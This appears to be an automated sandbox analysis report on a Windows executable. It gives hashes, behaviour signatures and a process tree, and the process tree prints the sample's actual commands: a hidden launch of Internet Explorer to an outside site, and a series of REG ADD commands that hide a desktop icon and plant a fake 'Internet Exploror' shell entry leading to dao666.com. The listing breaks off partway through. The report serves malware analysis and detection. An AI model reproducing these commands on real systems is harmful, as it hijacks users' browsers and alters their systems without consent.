Analysis

max time kernel: 95s
max time network: 157s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/09/2022, 10:03

Static task: static1
Behavioral task: behavioral1
  Sample: 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
  Resource: win10v2004-20220901-en

General

Target: 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
Size: 111KB
MD5: fbe6959908821fa3ea09c4f324c46c00
SHA1: a0ac296fb482f6be9b47a4428e94f0b87851b0f3
SHA256: 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83
SHA512: 5ffc516bfdba36b88cbc9558625dde31457258c99d9ff3869e9727601e7065b55588f82007fbcc53ebb2da37673dae07744ce32bdbfb42fc896d68b8c78370c0
SSDEEP: 3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHsifl:WTfFDbRnOTrAMY
Malware Config

Signatures

Creates new service(s) 1 TTPs

Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | cmd.exe
Drops file in Program Files directory 8 IoCs
description | ioc | Process
File created | C:\Program Files\WindWare\winare.vbs | cmd.exe
File opened for modification | C:\Program Files\WindWare\winare.vbs | cmd.exe
File created | C:\Program Files\WindWare\361.cmd | cmd.exe
File opened for modification | C:\Program Files\WindWare\361.cmd | cmd.exe
File created | C:\Program Files\WindWare\is.cmd | cmd.exe
File opened for modification | C:\Program Files\WindWare\is.cmd | cmd.exe
File created | C:\Program Files\WindWare\to.cmd | cmd.exe
File opened for modification | C:\Program Files\WindWare\to.cmd | cmd.exe
Drops file in Windows directory 4 IoCs
description | ioc | Process
File created | C:\Windows\Mail\UltraEdlt\is.cmd | cmd.exe
File opened for modification | C:\Windows\Mail\UltraEdlt\is.cmd | cmd.exe
File created | C:\Windows\Mail\UltraEdlt\winare.vbs | cmd.exe
File opened for modification | C:\Windows\Mail\UltraEdlt\winare.vbs | cmd.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
5096 | sc.exe
3368 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "630821889" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0003c52737ccd801 | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370363981" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985271" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985271" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "618789924" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "618789924" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985271" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000926f48011db5d0d1228815e050117de0214fad061a08be12c355377e9b1bd381000000000e80000000020000200000004a73de3198c1a0e96e2dec760682159e797ff218901a06c8c106dd70477fc424200000006c76ee7edac398cb9f8fe595545a19d1f648c176f0c90b4ceb4ba8cbe7f97ef240000000d6ad43b9a20228d5b3a36e7ded3284a8978d38f0d779a3df16377e08f7f45111c70f814985d69e00b63be16f25cefd0b424e47ee51066a67d6cdb1d2e194b65a | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000cccbd34b70b6e059f41f10fdb1ccd372046289459d5be82ad3511710eb2ec1cb000000000e800000000200002000000084d22d91f43bfed325a4796211172651d792cf7ba90aafa65c9cff8f8efda2cb200000004097ceb824d7e02c5065b3a03710e8b21f0e3e2ee21d7c4efdaeaba8749400d840000000e3fbcf5bac1aa141d9c3e0cf47beed90b0ab17e538cfc04d44bc63b1bdcd49035f427755c35fccf1aca7083aa173951f3e227d1ac9d6e14b08ce1fdc94f54e48 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{5062FD18-382A-11ED-A0EE-7A46CE8ECE48} = "0" | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b08be12737ccd801 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Modifies registry class 45 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" | reg.exe
Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
1212 | iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs
pid | Process
1212 | iexplore.exe
1212 | iexplore.exe
3548 | IEXPLORE.EXE
3548 | IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 3932 wrote to memory of 3464 | 3932 | 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe | 84
PID 3932 wrote to memory of 3464 | 3932 | 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe | 84
PID 3932 wrote to memory of 3464 | 3932 | 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe | 84
PID 3464 wrote to memory of 4844 | 3464 | WScript.exe | 85
PID 3464 wrote to memory of 4844 | 3464 | WScript.exe | 85
PID 3464 wrote to memory of 4844 | 3464 | WScript.exe | 85
PID 4844 wrote to memory of 1212 | 4844 | cmd.exe | 87
PID 4844 wrote to memory of 1212 | 4844 | cmd.exe | 87
PID 3464 wrote to memory of 1552 | 3464 | WScript.exe | 89
PID 3464 wrote to memory of 1552 | 3464 | WScript.exe | 89
PID 3464 wrote to memory of 1552 | 3464 | WScript.exe | 89
PID 1552 wrote to memory of 4996 | 1552 | cmd.exe | 91
PID 1552 wrote to memory of 4996 | 1552 | cmd.exe | 91
PID 1552 wrote to memory of 4996 | 1552 | cmd.exe | 91
PID 1552 wrote to memory of 1960 | 1552 | cmd.exe | 92
PID 1552 wrote to memory of 1960 | 1552 | cmd.exe | 92
PID 1552 wrote to memory of 1960 | 1552 | cmd.exe | 92
PID 1212 wrote to memory of 3548 | 1212 | iexplore.exe | 93
PID 1212 wrote to memory of 3548 | 1212 | iexplore.exe | 93
PID 1212 wrote to memory of 3548 | 1212 | iexplore.exe | 93
PID 1552 wrote to memory of 5088 | 1552 | cmd.exe | 94
PID 1552 wrote to memory of 5088 | 1552 | cmd.exe | 94
PID 1552 wrote to memory of 5088 | 1552 | cmd.exe | 94
PID 1552 wrote to memory of 1772 | 1552 | cmd.exe | 95
PID 1552 wrote to memory of 1772 | 1552 | cmd.exe | 95
PID 1552 wrote to memory of 1772 | 1552 | cmd.exe | 95
PID 1552 wrote to memory of 4212 | 1552 | cmd.exe | 96
PID 1552 wrote to memory of 4212 | 1552 | cmd.exe | 96
PID 1552 wrote to memory of 4212 | 1552 | cmd.exe | 96
PID 1552 wrote to memory of 4448 | 1552 | cmd.exe | 97
PID 1552 wrote to memory of 4448 | 1552 | cmd.exe | 97
PID 1552 wrote to memory of 4448 | 1552 | cmd.exe | 97
PID 1552 wrote to memory of 4968 | 1552 | cmd.exe | 98
PID 1552 wrote to memory of 4968 | 1552 | cmd.exe | 98
PID 1552 wrote to memory of 4968 | 1552 | cmd.exe | 98
PID 1552 wrote to memory of 636 | 1552 | cmd.exe | 99
PID 1552 wrote to memory of 636 | 1552 | cmd.exe | 99
PID 1552 wrote to memory of 636 | 1552 | cmd.exe | 99
PID 1552 wrote to memory of 3120 | 1552 | cmd.exe | 100
PID 1552 wrote to memory of 3120 | 1552 | cmd.exe | 100
PID 1552 wrote to memory of 3120 | 1552 | cmd.exe | 100
PID 1552 wrote to memory of 2456 | 1552 | cmd.exe | 101
PID 1552 wrote to memory of 2456 | 1552 | cmd.exe | 101
PID 1552 wrote to memory of 2456 | 1552 | cmd.exe | 101
PID 1552 wrote to memory of 2960 | 1552 | cmd.exe | 102
PID 1552 wrote to memory of 2960 | 1552 | cmd.exe | 102
PID 1552 wrote to memory of 2960 | 1552 | cmd.exe | 102
PID 1552 wrote to memory of 2684 | 1552 | cmd.exe | 103
PID 1552 wrote to memory of 2684 | 1552 | cmd.exe | 103
PID 1552 wrote to memory of 2684 | 1552 | cmd.exe | 103
PID 1552 wrote to memory of 2200 | 1552 | cmd.exe | 104
PID 1552 wrote to memory of 2200 | 1552 | cmd.exe | 104
PID 1552 wrote to memory of 2200 | 1552 | cmd.exe | 104
PID 1552 wrote to memory of 2260 | 1552 | cmd.exe | 105
PID 1552 wrote to memory of 2260 | 1552 | cmd.exe | 105
PID 1552 wrote to memory of 2260 | 1552 | cmd.exe | 105
PID 1552 wrote to memory of 2700 | 1552 | cmd.exe | 106
PID 1552 wrote to memory of 2700 | 1552 | cmd.exe | 106
PID 1552 wrote to memory of 2700 | 1552 | cmd.exe | 106
PID 1552 wrote to memory of 3888 | 1552 | cmd.exe | 107
PID 1552 wrote to memory of 3888 | 1552 | cmd.exe | 107
PID 1552 wrote to memory of 3888 | 1552 | cmd.exe | 107
PID 1552 wrote to memory of 5004 | 1552 | cmd.exe | 108
PID 1552 wrote to memory of 5004 | 1552 | cmd.exe | 108
Processes

Each entry gives the tree depth in brackets, the image path, the command line, the PID and the signatures it triggered.

[1] C:\Users\Admin\AppData\Local\Temp\2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
    command: "C:\Users\Admin\AppData\Local\Temp\2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe"
    PID: 3932
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\WScript.exe
      command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\51dd.vbs"
      PID: 3464
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        command: "C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?51dd
        PID: 4844
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

      [4] C:\Program Files\Internet Explorer\iexplore.exe
          command: "C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?51dd
          PID: 1212
          - Modifies Internet Explorer settings
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

        [5] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            command: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1212 CREDAT:17410 /prefetch:2
            PID: 3548
            - Modifies Internet Explorer settings
            - Suspicious use of SetWindowsHookEx

    [3] C:\Windows\SysWOW64\cmd.exe
        command: "C:\Windows\System32\cmd.exe" /C .\to.cmd
        PID: 1552
        - Drops file in Windows directory
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
          PID: 4996

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 1960
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
          PID: 5088
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
          PID: 1772
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
          PID: 4212
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
          PID: 4448
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
          PID: 4968
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
          PID: 636
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
          PID: 3120
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
          PID: 2456
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
          PID: 2960
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
          PID: 2684
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
          PID: 2200
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
          PID: 2260
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
